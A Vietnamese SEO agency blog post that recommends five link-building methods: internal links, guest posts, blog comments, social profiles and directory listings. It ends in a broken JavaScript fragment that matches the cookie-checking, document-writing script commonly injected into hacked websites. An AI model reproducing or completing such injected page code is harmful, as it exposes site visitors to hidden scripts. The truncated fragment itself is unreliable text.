Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > TOP 5 chiến lược xây dưng link

TOP 5 chiến lược xây dưng link

Xây dựng link là một thủ thuật tuyệt vời trong việc gia tăng thứ hạng tìm kiếm của Website. Thêm link vào các trang chính thức và có lượng truy cập nhiều là các hữu hiệu để có được sự chú ý tích cực của Google và các công cụ tìm kiếm khác.

công ty seo

Kết quả có thể là có visitor mới, tăng tính độc quyền Web và gia tăng thứ hạng tìm kiếm. Thêm vào đó, việc tiến hành Marketing Online theo chuẩn mực, giống như là chất lượng nội dung, thiết kế Web tốt và những cam kết, việc xây dựng link có thể là công cụ đem đến thành công cho Website của bạn

Có hàng trăm chiến lược để xây dựng link, nhưng có 5 phương pháp có thể lôi kéo được lượng traffic cho Website của bạn

I. Link nội bộ.

Các dễ dàng nhất để xây dựng link là lấy những backlink từ ngay site của bạn bằng cách post bài lên blog. Điều này có giúp người đọc trực tiếp xem những bài post và góp ý về những thông tin về topic đó. Không chỉ mang đến các thông tin hữu ích, nó còn giúp Google bot tìm ra những thông tin có ích mà website của bạn đang có. Chắc chắn rằng những link này liền mạch và tự nhiên, nhưng không nên để quá nhiều link trong mỗi bài post.

II. Khách mời Blog.

Gia tăng sự độc quyền bằng cách thúc đẩu các mối quan hệ với blog khác hay các site khác. Những vị khách này đăng thông tin và có backlink dẫn về Website của bạn.

III. Comment.

Bạn có thể thức đẩy những kết nối với blog khác bằng cách comment lên các bài post của họ. Đây là cách đơn giản nhất để tạo ra backlink cho site của bạn. Những comment thú vị còn có thể lôi kéo thêm nhiều người đọc và view Web của bạn

IV. Truyền thông mạng xã hội.

Đăng tải profile online vào các trang mạng xã hội và giữ cho chúng có mối liên hệ đến Website hoặc những nội dung hấp dẫn. Và đừng quên post kèm link Website vào các page khác trong vòng kết nối mạng xã hội của bạn

V. Từ điển.

Đăng thông tin Website của bạn vào các từ điển có thể giúp người đọc tìm ra bạn nhưng nhớ là phải chọn những từ điển thích hợp. Vài cái có thể được xem như là spam.

– Chắc chắn rằng những bài post trong blog vào những mục phù hợp. Một website nói về xe máy không thể đưa vào từ điển về nội thất được.

– Đăng vào từ điển mà có thứ hạng cao hay những phản hồi tốt.

Tóm lại việc xây dựng link là một chiến lược nhằm gia tăng thứ hạng của bạn trên kết quả tìm kiếm. Tạo ra những backlink thành công là một trong những tiến trình quan trọng để thực thi chiến lược này. Trong khi có hàng trăm cách để tạo ra chúng, 5 cách trên là những cách cơ bản và mang lại nhiều lợi ích nhất!

Dịch vụ SEOPrido

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘